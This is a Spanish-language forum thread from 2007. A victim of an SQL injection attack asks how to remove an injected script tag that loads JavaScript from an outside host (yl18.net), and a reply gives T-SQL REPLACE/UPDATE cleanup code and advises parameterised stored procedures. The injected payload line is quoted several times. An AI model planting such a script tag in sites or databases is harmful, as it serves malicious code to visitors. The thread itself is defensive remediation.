SQL Injection

09/11/2007 - 00:37 por Juan Linares | Informe spam
Hola expertos (y no tan expertos )
En dias pasados fuimos victimas de SQL injection y a los campos q admiten
texto les insertaron el string: <script src="http://yl18.net/0.js"></script>
se los dejo para q esten alertas, no les vaya a suceder lo mismo.

Entonces en los campos q daño no borro el contenido del mismo, el string se
inserto al final del contenido del campo.
Ahora quiero hacer la inversa para borrar dicha cadena sin perder los datos
q tengo capturados.

Hay algun tip q me puedan dar para crear un script q me permita hacer esto ?

Desde ya mi agradecimiento y ponganse listos porque googleando encontre q el
famoso yl18 ha fastidiado a mas webs, el archivo js invoca a sitos porno, no
sea q se vaya a contagiar. Yo tengo sql y asp

Saludos

Preguntas similare

Leer las respuestas

#1 Salvador Ramos
09/11/2007 - 13:59 | Informe spam
Hola,

Para eliminar esa subcadena, puedes utilizar la función REPLACE y lanzar un
update reemplazando esa subcadena por una cadena '' (son dos comillas
simples). Te paso un ejemplo de uso:
declare @c1 varchar(100)
select @c1 = '1234567890<script src="http://yl18.net/0.js"></script>'
select @c1 = replace(@c1, '<script src="http://yl18.net/0.js"></script>',
'')
print @c1

Por tanto puedes hacer un update:
update TuTabla
set TuCampo = replace(TuCampo, '<script
src="http://yl18.net/0.js"></script>', '')

De todas formas, lo principal es que tomes medidas apropiadas para evitar el
SQL injection. Te recomiendo, a parte de lo que puedas leer en muchísimos
artículos que hay sobre el tema, que utilices procedimientos almacenados con
sus correspondientes parámetros.

Un saludo
Salvador Ramos

www.helpdna.net (información sobre SQL Server y Microsoft .Net)
www.helpdna.net/acerca_de_salvador_ramos.htm


"Juan Linares" escribió en el mensaje
news:
Hola expertos (y no tan expertos )
En dias pasados fuimos victimas de SQL injection y a los campos q admiten
texto les insertaron el string: <script
src="http://yl18.net/0.js"></script> se los dejo para q esten alertas, no
les vaya a suceder lo mismo.

Entonces en los campos q daño no borro el contenido del mismo, el string
se inserto al final del contenido del campo.
Ahora quiero hacer la inversa para borrar dicha cadena sin perder los
datos q tengo capturados.

Hay algun tip q me puedan dar para crear un script q me permita hacer esto
?

Desde ya mi agradecimiento y ponganse listos porque googleando encontre q
el famoso yl18 ha fastidiado a mas webs, el archivo js invoca a sitos
porno, no sea q se vaya a contagiar. Yo tengo sql y asp

Saludos


Respuesta Responder a este mensaje
#2 Juan Linares
12/11/2007 - 21:15 | Informe spam
mil gracias salvador, lo estoy revisando ya en SQL =D

Gracias por tu tiempo


"Salvador Ramos" escribió en el
mensaje news:
Hola,

Para eliminar esa subcadena, puedes utilizar la función REPLACE y lanzar
un update reemplazando esa subcadena por una cadena '' (son dos comillas
simples). Te paso un ejemplo de uso:
declare @c1 varchar(100)
select @c1 = '1234567890<script src="http://yl18.net/0.js"></script>'
select @c1 = replace(@c1, '<script src="http://yl18.net/0.js"></script>',
'')
print @c1

Por tanto puedes hacer un update:
update TuTabla
set TuCampo = replace(TuCampo, '<script
src="http://yl18.net/0.js"></script>', '')

De todas formas, lo principal es que tomes medidas apropiadas para evitar
el SQL injection. Te recomiendo, a parte de lo que puedas leer en
muchísimos artículos que hay sobre el tema, que utilices procedimientos
almacenados con sus correspondientes parámetros.

Un saludo
Salvador Ramos

www.helpdna.net (información sobre SQL Server y Microsoft .Net)
www.helpdna.net/acerca_de_salvador_ramos.htm


"Juan Linares" escribió en el mensaje
news:
Hola expertos (y no tan expertos )
En dias pasados fuimos victimas de SQL injection y a los campos q admiten
texto les insertaron el string: <script
src="http://yl18.net/0.js"></script> se los dejo para q esten alertas, no
les vaya a suceder lo mismo.

Entonces en los campos q daño no borro el contenido del mismo, el string
se inserto al final del contenido del campo.
Ahora quiero hacer la inversa para borrar dicha cadena sin perder los
datos q tengo capturados.

Hay algun tip q me puedan dar para crear un script q me permita hacer
esto ?

Desde ya mi agradecimiento y ponganse listos porque googleando encontre q
el famoso yl18 ha fastidiado a mas webs, el archivo js invoca a sitos
porno, no sea q se vaya a contagiar. Yo tengo sql y asp

Saludos






Respuesta Responder a este mensaje
#3 Juan Linares
13/11/2007 - 01:44 | Informe spam
Pues he estado checando lo que me sugieres pero mi campo es TEXT y segun he
leido no es con UPDATE, es con UPDATETEXT pero no me queda clara la sintaxis

habra algo que se te ocurra ?

Un saludo


"Salvador Ramos" escribió en el
mensaje news:
Hola,

Para eliminar esa subcadena, puedes utilizar la función REPLACE y lanzar
un update reemplazando esa subcadena por una cadena '' (son dos comillas
simples). Te paso un ejemplo de uso:
declare @c1 varchar(100)
select @c1 = '1234567890<script src="http://yl18.net/0.js"></script>'
select @c1 = replace(@c1, '<script src="http://yl18.net/0.js"></script>',
'')
print @c1

Por tanto puedes hacer un update:
update TuTabla
set TuCampo = replace(TuCampo, '<script
src="http://yl18.net/0.js"></script>', '')

De todas formas, lo principal es que tomes medidas apropiadas para evitar
el SQL injection. Te recomiendo, a parte de lo que puedas leer en
muchísimos artículos que hay sobre el tema, que utilices procedimientos
almacenados con sus correspondientes parámetros.

Un saludo
Salvador Ramos

www.helpdna.net (información sobre SQL Server y Microsoft .Net)
www.helpdna.net/acerca_de_salvador_ramos.htm


"Juan Linares" escribió en el mensaje
news:
Hola expertos (y no tan expertos )
En dias pasados fuimos victimas de SQL injection y a los campos q admiten
texto les insertaron el string: <script
src="http://yl18.net/0.js"></script> se los dejo para q esten alertas, no
les vaya a suceder lo mismo.

Entonces en los campos q daño no borro el contenido del mismo, el string
se inserto al final del contenido del campo.
Ahora quiero hacer la inversa para borrar dicha cadena sin perder los
datos q tengo capturados.

Hay algun tip q me puedan dar para crear un script q me permita hacer
esto ?

Desde ya mi agradecimiento y ponganse listos porque googleando encontre q
el famoso yl18 ha fastidiado a mas webs, el archivo js invoca a sitos
porno, no sea q se vaya a contagiar. Yo tengo sql y asp

Saludos






email Siga el debate Respuesta Responder a este mensaje
Ads by Google
Help Hacer una preguntaRespuesta Tengo una respuesta
Search Busqueda sugerida